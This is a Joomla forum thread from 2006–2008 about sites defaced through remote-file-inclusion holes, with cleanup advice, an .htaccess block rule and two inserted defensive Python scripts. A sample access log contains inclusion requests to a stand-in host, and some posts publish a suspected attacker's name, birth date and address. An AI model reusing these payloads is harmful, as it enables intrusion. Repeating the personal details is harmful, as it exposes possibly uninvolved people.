Hacked by MEFISTO

jproducer
Joomla! Intern
Posts: 67
Joined: Mon Sep 26, 2005 4:37 am
Location: Denver

Hacked by MEFISTO

Post by jproducer » Wed Jul 26, 2006 4:46 am

Well, looks like I stepped away from my site for about a month and got hacked. I guess I'm posting because I'm hoping if someone looks at the page they can see the errors and maybe give a little hand.

I can't give much info, but can investigate. I had joomla 1.0.9 and had several components. I am not a master joomla user like some of the other threads I read about this. I'm just posting hoping it might get some questions that I can try and investigate and answer.

Here's my site, just happened in the last couple of days. I haven't checked in about a week.

http://www.prettymess.net/main/

Man, I really put a lot of work into this site and it was just about my recording studio. I guess I was naive to believe that I was not going to be targeted by someone with too much time on their hands. My mistake.

(I'm sure you can probably sense the defeat in my post, this really bums me out)
If you heard that...you should be the engineer!
http://www.prettymess.net

infograf768
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Hacked by MEFISTO

Post by infograf768 » Wed Jul 26, 2006 5:48 am

1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will certainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

jproducer
Joomla! Intern
Posts: 67
Joined: Mon Sep 26, 2005 4:37 am
Location: Denver

Re: Hacked by MEFISTO

Post by jproducer » Thu Jul 27, 2006 2:37 pm

Ext Cal, Joombook, and joomlaxplorer, I believe.

I do recall a little trouble with my ext cal first.
If you heard that...you should be the engineer!
http://www.prettymess.net

crash777
Joomla! Explorer
Posts: 334
Joined: Sat Sep 03, 2005 1:56 am
Location: Upstate New York

Re: Hacked by MEFISTO

Post by crash777 » Thu Jul 27, 2006 4:20 pm

infograf768 wrote: 1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will certainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Not just reinstalling though.. make sure to REMOVE everything first.. or go through each directory and clean it.. I had at least a hundred malicious script files interspersed in my joomla folders AND the htaccess files were all hacked too..
Thanks!
Aaron

infograf768
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Hacked by MEFISTO

Post by infograf768 » Thu Jul 27, 2006 4:31 pm

crash777 wrote:
infograf768 wrote: 1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will certainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).
Not just reinstalling though.. make sure to REMOVE everything first.. or go through each directory and clean it.. I had at least a hundred malicious script files interspersed in my joomla folders AND the htaccess files were all hacked too..
Right.  ;)
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

Asphyx
Joomla! Hero
Posts: 2454
Joined: Sun Aug 28, 2005 5:03 pm

Re: Hacked by MEFISTO

Post by Asphyx » Thu Jul 27, 2006 4:58 pm

I believe there is an update for extcal available (forget where I read that...)

Elpie
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm

Re: Hacked by MEFISTO

Post by Elpie » Fri Jul 28, 2006 1:28 am

That announcement about the security update for ExtCalendar and links to download are here: http://forum.joomla.org/index.php/topic ... #msg402249

@jproducer - check your files via ftp to see the dates on which they were changed. Since you have been away it should be easy to spot files that were created or modified in the period you weren't doing any work on the site. In most cases, these crackers have not touched the database - a quick check through using phpMyAdmin or whatever you use for database management will tell you if your data has been compromised. If it's ok, the best thing to do would be to back up your database, back up your template folder to your PC (and check files carefully for any changes), then delete all files and do a clean install of Joomla 1.0.10. If your template is fine it's then just a matter of adding that back in and importing your database.

Before adding back any extensions, check the 3PD security forum to make sure you don't install something known to be insecure.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
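As an added illustration of the file check Elpie describes above (and of crash777's point that stray scripts and edited .htaccess files can sit anywhere in the tree), here is a script that is not from this thread or from the Joomla project. It builds a small constructed site tree next to a constructed pristine reference tree, then reports files that were added, changed or removed by comparing SHA-256 digests, lists files that carry the c99shell header string, and separately lists files whose modification time falls after a cutoff. The function names, the placeholder file contents and the timestamps are my own; the file names (c99.php, .thumbs.php under com_jd-wiki) follow those reported in this thread. The timestamp check is kept separate on purpose: a shell can reset a file's mtime after writing it, which the demo simulates for .thumbs.php, so the mtime pass misses that file while the hash comparison still catches it.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Header strings the shells named in this thread carry; used only to flag files for review.
SHELL_MARKERS = (b"c99shell", b"c99sh_surl")
# Demo timestamps (epoch seconds, constructed): "untouched" = June 2006, cutoff = 1 July 2006.
DEMO_OLD_MTIME = 1149120000.0
DEMO_CUTOFF = 1151712000.0


def _files(root):
    root = Path(root)
    return [p for p in root.rglob("*") if p.is_file()]


def hash_tree(root):
    """Map each file's path (relative to root, POSIX form) to its SHA-256 hex digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in _files(root)}


def compare_trees(reference_root, site_root):
    """Diff a downloaded site against a pristine unpacked copy of the same release."""
    ref, site = hash_tree(reference_root), hash_tree(site_root)
    return {
        "added": sorted(p for p in site if p not in ref),
        "modified": sorted(p for p in site if p in ref and site[p] != ref[p]),
        "missing": sorted(p for p in ref if p not in site),
    }


def find_marked_files(root, markers=SHELL_MARKERS):
    """Files whose bytes contain any of the marker strings."""
    root = Path(root)
    return sorted(p.relative_to(root).as_posix() for p in _files(root)
                  if any(m in p.read_bytes() for m in markers))


def recently_modified(root, since_epoch):
    """Files with an mtime after the cutoff: quick to check, but an attacker can reset mtimes."""
    root = Path(root)
    return sorted(p.relative_to(root).as_posix() for p in _files(root)
                  if p.stat().st_mtime > since_epoch)


def build_demo():
    """Construct a pristine reference tree and a tampered site copy (placeholder contents)."""
    base = Path(tempfile.mkdtemp(prefix="joomla-check-"))
    ref, site = base / "reference", base / "site"
    shipped = {
        "index.php": b"<?php /* front controller (placeholder) */\n",
        ".htaccess": b"RewriteEngine On\n",
        "components/com_jd-wiki/lib/tpl/default/main.php": b"<?php /* template (placeholder) */\n",
    }
    for root in (ref, site):
        for rel, content in shipped.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(content)
    # Site-specific file that is legitimately absent from the distribution.
    (site / "configuration.php").write_bytes(b"<?php /* site settings (placeholder) */\n")
    for p in _files(ref) + _files(site):
        os.utime(p, (DEMO_OLD_MTIME, DEMO_OLD_MTIME))
    # Tampering mirroring this thread: defaced index.php, edited .htaccess, two dropped shells.
    (site / "index.php").write_bytes(b"<html><title>defaced (placeholder)</title></html>\n")
    (site / ".htaccess").write_bytes(b"RewriteEngine On\n# injected line (placeholder)\n")
    (site / "c99.php").write_bytes(b"<?php /* c99shell marker only, placeholder */\n")
    hidden = site / "components/com_jd-wiki/lib/tpl/default/.thumbs.php"
    hidden.write_bytes(b"<?php /* c99shell marker only, placeholder */\n")
    # Simulate a shell that restores the old timestamp after writing its own file.
    os.utime(hidden, (DEMO_OLD_MTIME, DEMO_OLD_MTIME))
    return str(ref), str(site)


if __name__ == "__main__":
    ref_dir, site_dir = build_demo()
    for kind, paths in compare_trees(ref_dir, site_dir).items():
        print(f"{kind}: {paths}")
    print("shell markers:", find_marked_files(site_dir))
    print("mtime after cutoff:", recently_modified(site_dir, DEMO_CUTOFF))
```

Against a real site, point compare_trees at an unpacked copy of the same Joomla release (plus the original packages of the installed extensions) and at the files downloaded over ftp. Everything under "added" that is not a site-specific file such as configuration.php, uploaded media or a known extension needs a look, and anything under "modified" is a candidate for replacement from the clean package rather than a hand cleanup, which is the reinstall route the posters above recommend.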

jproducer
Joomla! Intern
Posts: 67
Joined: Mon Sep 26, 2005 4:37 am
Location: Denver

Re: Hacked by MEFISTO

Post by jproducer » Fri Jul 28, 2006 3:38 am

Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?

I know this is a newbie question, but is it possible?
If you heard that...you should be the engineer!
http://www.prettymess.net

brad
Joomla! Master
Posts: 13272
Joined: Fri Aug 12, 2005 12:38 am
Location: Australia

Re: Hacked by MEFISTO

Post by brad » Fri Jul 28, 2006 3:40 am

jproducer wrote: Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?

I know this is a newbie question, but is it possible?
Yip. Just remove and replace your Joomla files. You will lose any non-core components/modules etc etc though. You might want to ensure you know how to configure your configuration.php file though... once new files are in place, set up configuration.php to connect to the database and you should be good to go.

lnieves
Joomla! Fledgling
Posts: 1
Joined: Sat Jul 29, 2006 2:33 pm

Re: Hacked by MEFISTO

Post by lnieves » Sat Jul 29, 2006 5:58 pm

I'm another victim of this pirate called MEFISTO. My website was "defaced" using the c99shell script. The attack apparently is related to the com_securityimages component.

During the minutes prior to my web site being hijacked by this [Edit by mod: watch your language. Using such terms will not help solve your problems] I found multiple requests of the form

Mod Edit: Please don't paste log files to the forums. Thank you. -RobS

To my surprise, this URL gives access to perform all kinds of operations on the filesystem. MEFISTO then proceeded to overwrite the "configuration.php" with a simple HTML page.

I now have the following in my .htaccess for protection:
RewriteCond %{QUERY_STRING} .*mosConfig_absolute_path.*
RewriteRule .* - [F,L]
which will give an HTTP 403 error on any subsequent attempt to exploit the bug. This is admittedly not a permanent solution.
Last edited by infograf768 on Sun Jul 30, 2006 5:41 am, edited 1 time in total.
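The log search infograf768 suggests earlier in the thread and the request pattern lnieves describes above, as an added example that is not from either poster or from the Joomla project: a small parser for Apache combined-format access logs that flags any request whose query string carries a parameter beginning with mosConfig_, records whether the supplied value points at a remote URL, and tallies flagged requests per client address. The log lines are constructed samples using RFC 5737 documentation addresses and an .invalid host, not this thread's logs; the function names and the mosconfig_ prefix argument are my own. Matching here is case-insensitive and runs after URL decoding, whereas the %{QUERY_STRING} tested by the RewriteCond above is the raw, undecoded query string, so the two will not always agree on the same request.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines (not the thread's logs): documentation IPs, .invalid host.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Jul/2006:03:12:07 +0000] "GET /main/index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8421 "-" "Mozilla/4.0"
203.0.113.77 - - [25/Jul/2006:03:14:51 +0000] "GET /main/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://example.invalid/x.txt HTTP/1.1" 200 3122 "-" "libwww-perl/5.805"
203.0.113.77 - - [25/Jul/2006:03:15:02 +0000] "GET /main/index.php?option=com_securityimages&mosconfig_absolute_path=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 3122 "-" "libwww-perl/5.805"
198.51.100.9 - - [25/Jul/2006:03:20:44 +0000] "POST /main/administrator/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client - - [time] "METHOD target [protocol]" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def scan_log(text, prefix="mosconfig_"):
    """Return one record per request carrying a query parameter named <prefix>* (case-insensitive)."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # blank line or a line in some other format
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes names and values, so encoded variants are seen too
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name.lower().startswith(prefix):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "status": int(m.group("status")),
                    "path": parts.path,
                    "param": name,
                    "value": value,
                    "remote": value.lower().startswith(REMOTE_SCHEMES),
                })
    return hits


def hits_by_ip(hits):
    """Count flagged requests per client address."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        flag = "REMOTE" if h["remote"] else "local"
        print(f'{h["time"]} {h["ip"]} {h["status"]} {h["path"]} {h["param"]}={h["value"]} [{flag}]')
    print("per client:", hits_by_ip(found))
```

The timestamps of the flagged requests give the window to use when going through the ftp listing for created or changed files, which ties this back to the file check suggested earlier in the thread; the client addresses are what you would pass on to your host or to the abuse contact of the network they belong to.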

Autoit
Joomla! Intern
Posts: 59
Joined: Sun Apr 09, 2006 4:01 pm

Re: Hacked by MEFISTO

Post by Autoit » Mon Aug 07, 2006 5:45 pm

my site:

/index.php:

Code:

<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>HaCKed By MEFISTO</title>
</head>

<body bgcolor="#000000" text="#808080">

<p align="center"> </p>
<p align="center"> </p>
<p align="center">
<img src="http://img301.imageshack.us/img301/6885/takeittuxlo5.jpg" width="200" height="300"></p>
<p align="center"> </p>

<p align="center"><font size="6"> HACKED By MEFISTO </font></p>
<p align="center"><font size="5">it's Not Hack..it's ******** BabE </font></p>
<p align="center"><font size="5">[email protected]</font></p>
<p align="center"><font size="5">ThanKs All My Friends..</font></p>
<p align="center"><font size="5">HACKED</font></p>

I found:

"/" added c99.php
"/components/com_jd-wiki/lib/tpl/default/" added .thumbs.php


in .thumbs.php:

Code:

<?php
/*
******************************************************************************************************
*
*  c99shell.php v.1.0 pre-release build #16
*  Freeware license.
*  [removed].
*  http://[removed].ru/releases/c99shell
*
*  WEB: http://[removed].ru
*  ICQ UIN #: 656555
*
...
in c99.php:

Code:

*  c99shell.php v.1.0 beta

My site log is in the attachment:
[removed by moderator: NEVER post vulnerable logs!]
Last edited by nathandiehl on Mon Aug 07, 2006 6:08 pm, edited 1 time in total.
### Joomla! AutoIt! ###
Joomla! 中文交流平台  [Chinese GMT +8] http://www.autoit.cn

friesengeist
Joomla! Guru
Posts: 842
Joined: Sat Sep 10, 2005 10:31 pm

Re: Hacked by MEFISTO

Post by friesengeist » Mon Aug 07, 2006 7:12 pm

We may not be able to control the wind, but we can always adjust our sails

Predator
Joomla! Ace
Posts: 1823
Joined: Wed Aug 17, 2005 10:12 pm
Location: Germany-Bad Abbach

Re: Hacked by MEFISTO

Post by Predator » Mon Aug 07, 2006 7:14 pm

There is no need to install the new version completely; just unzip and replace the templates default and nucleus in /components/com_jd-wiki/lib/tpl, that's it if you only want to update.

If you have Register Globals off you are secure, but to be sure also update the templates; the Remote Include Vulnerability works only with RG = On.
Last edited by Predator on Mon Aug 07, 2006 7:24 pm, edited 1 time in total.
The "Humor, Fun and Games" forum has  more than 2500 Posts, so why not build a "Humor, Fun and Games Working" Group?
.....
Malicious tongues say we have this WG right from the start, they call it core team :D

Autoit
Joomla! Intern
Posts: 59
Joined: Sun Apr 09, 2006 4:01 pm

Re: Hacked by MEFISTO

Post by Autoit » Mon Aug 07, 2006 7:21 pm

;) thank all!
### Joomla! AutoIt! ###
Joomla! 中文交流平台  [Chinese GMT +8] http://www.autoit.cn

batje
Joomla! Fledgling
Posts: 4
Joined: Sun Sep 04, 2005 7:43 am
Location: Kampala, Uganda

Re: Hacked by MEFISTO

Post by batje » Mon Aug 14, 2006 2:40 pm

Just a bit of googling:

[email protected] brings you a lot of sites that have been hacked by this ingenious fellow. But no info. Although there is a lot of Turkish around these pages, somehow...

Doing a search for mefistofales brings up more interesting stuff, amongst which 3 profiles, one in Czech, one in Romania and this one, in Turkish:

http://www.blogcu.com/mefistofales

How many people would use this nickname and speak Turkish?

There is an email address: [email protected] And a profile page:

http://www.blogcu.com/mefistofales/profile/

with this info:

Blog: ve ve ve
her şeyi bulabileceğiniz bir yer olma umuduyla

• Ad Soyad: selcuk yardimciel
• Cinsiyet: Erkek
• Doğum Tarihi: Kasım 12, 1983 (Yaş: 22)
• Yer: ankara, Turkiye
• Blog Kategorisi: Diğer

Yazdığım Yazılar: 0 kayıt
Yazdığım Yorumlar: 0 yorum
Alınan Yorumlar: 0 yorum
Kayıt Tarihi: 10 Mayıs 2006
Son Giriş: 19 Mayıs 2006

Is there anyone who reads Turkish? For example, what does Diger stand for?

The attack on my server was performed using a script hosted under a Yahoo account called sikat_pl. You can see the code here: http://geocities.com/sikat_pl/nenen.txt
Sikat btw seems to be a Filipino word if you google for it.

The IP address from where the attack was staged was 125.160.81.175. I can't trace that address, even with http://www.ripe.net, and my ISP does not allow me to do traceroutes either.

The second hacker btw was [email protected], and he also seems to master the Turkish language. I think he just started, because Google does not reveal a lot of information about this fellow.

Do other people have similar logs?

BTW, this post blocked the attack: http://forum.joomla.org/index.php/topic,75376.0.html

I just went into the backend of my website. I have a statistics component running. And guess what? It shows the last visitor! And guess what? He is from Turkey! And guess what? He has an ADSL modem. It's happily located at

dsl.static8510111679.ttnet.net.tr

If you were also hacked by this Mefisto guy, you can send an email to his provider at [email protected], asking for the guy's name and address so that you can file a lawsuit against him. Given the fact that he seems to be relatively active, and Turkey really wants to show it is ready to join the EU, I expect they will answer positively to this request.
Last edited by batje on Mon Aug 14, 2006 3:03 pm, edited 1 time in total.
OpenSource from Africa
http://www.mountbatten.net

chilifrei64
Joomla! Apprentice
Posts: 31
Joined: Thu Feb 16, 2006 9:40 pm
Location: Detroit, MI

Re: Hacked by MEFISTO

Post by chilifrei64 » Tue Aug 15, 2006 12:00 pm

Yeah, there has to be some sort of security hole in joomla. I am on the latest 1.0.10 and 3 of my sites were hit.

Only the index.php was rewritten on each site (at least all I could find).

Might be something to look into. I have not been able to find any c99.php script.. The only components are

joomlaxplorer (latest version)
my comment (this was installed the day it was hacked; latest version)
community builder (updated a week ago after the new security release)

Hope this helps you figure it out.

Johnny911
Joomla! Fledgling
Posts: 1
Joined: Mon Sep 10, 2007 2:11 pm

Re: Hacked by MEFISTO

Post by Johnny911 » Mon Sep 10, 2007 2:17 pm

Whoever this Mefisto is, he's nothing but a low-life hacker wannabe, any real hacker with any shred of dignity wouldn't stoop to something as low as trashing your website..
Find your dryer parts the easy way...

Nibblers
Joomla! Apprentice
Posts: 43
Joined: Thu Nov 23, 2006 7:52 pm

Re: Hacked by MEFISTO

Post by Nibblers » Mon Sep 10, 2007 3:35 pm

Here are the details of this hacker's website: http://WWW.ROOTHACKER.ORG and

His e-mail is: [email protected]

Domain ID: D122651965-LROR
Domain Name: ROOTHACKER.ORG
Created On: 18-May-2006 21:19:50 UTC
Last Updated On: 21-Aug-2007 21:57:20 UTC
Expiration Date: 18-May-2008 21:19:50 UTC
Sponsoring Registrar: Directi Internet Solutions d/b/a PublicDomainRegistry.Com
(R27-LROR)
Status:OK
Registrant ID: DI_4725324
Registrant Name: Neo Anderson
Registrant Organization: A.S
Registrant Street1: Kadikoy iskele caddesi no:12
Registrant Street2:
Registrant Street3:
Registrant City: kadikoy
Registrant State/Province: Istanbul
Registrant Postal Code: 06000
Registrant Country: TR
Registrant Phone: +212.5555555

The same info for Admin and Technical contact.

His name is probably false [ref: Matrix] , but you never know. The address seems a legit personal home address.

The IP for these nameservers is: 80.93.221.97

The name servers are:
ROOT.ROOTHACKER.ORG
DAMAR.ROOTHACKER.ORG

Address DN                      Type    Value
97.221.93.80.in-addr.arpa  name    host-80-93-221-97.teklan.com.tr 

He has had 22 unique nameserver changes for this domain within the last year.


Other domain associations: hackturkiye.net as well as hackyurkiya.com


As his website contains illegal material, his illegal activity is attributable with a Google search and he seems to be hosting the site at home, I'd complain to the Domain Name Registrar of .org domains and complain to the registering agent: Directi Internet Solutions, who are based in the USA, requesting deletion of the domain name.
Last edited by Nibblers on Mon Sep 10, 2007 3:54 pm, edited 1 time in total.

Nibblers
Joomla! Apprentice
Posts: 43
Joined: Thu Nov 23, 2006 7:52 pm

Re: Hacked by MEFISTO

Post by Nibblers » Thu Aug 28, 2008 12:17 pm

Some news - this person was behind the organisation many joomla hackers came from including MEFISTO...

http://thebellwetherdaily.[URL banned].com/ ... acker.html

Sunday, March 02, 2008
FBI Probing Ohio-based Computer Hacker: European Webhost Targeted From Cincinnati Surburb?

CINCINNATI (TDB) -- The FBI's computer crimes squad is on the trail of an Ohio hacker suspected of defacing Internet sites that use a company in Finland, Scene Group Oy, as their webhost. One of the targeted 'net sites reportedly was BahiaNetStore.com, which markets Brazilian-themed women's apparel. A federal magistrate authorized a search warrant last week for a Butler County home near Cincinnati where the hacker may have operated under the online screen name, or hacker tag, "Evilthoutz." No charges have been filed.

Scene Group is a private firm based in Pori, a city of more than 100,000 residents that is the 10th largest in Finland. A company official, Mikko Kivinen, is identified in a federal court affidavit obtained by The Daily Bellwether as first reporting the hacking incidents last November 28. Kivinen later traced the suspected hacker to an online bulletin board and a page on MySpace. Kivinen told the FBI his company was a target:

"Kivinen also stated that Evilthoutz was successful in hacking into the company's server and forwarding several e-mails to the e-mail address *****. During the hack, Evilthoutz tried to change the root password of the server and was unsuccessful. Evilthoutz then called the company hosting the servers, located in Texas, in an attempt to socially engineer the root password. Again, Evilthoutz was unsuccessful in changing the root password. Kivinen noted that the last website defacement occurred on December 27, 2007. Kivinen had no idea why Evilthoutz targeted his company."

The FBI said a confidential informant has contacted the suspected hacker online and discussed website defacements. Other records about Evilthoutz were subpoenaed from Microsoft and Cincinnati Bell, which operates a highspeed Internet service called Zoomtown.

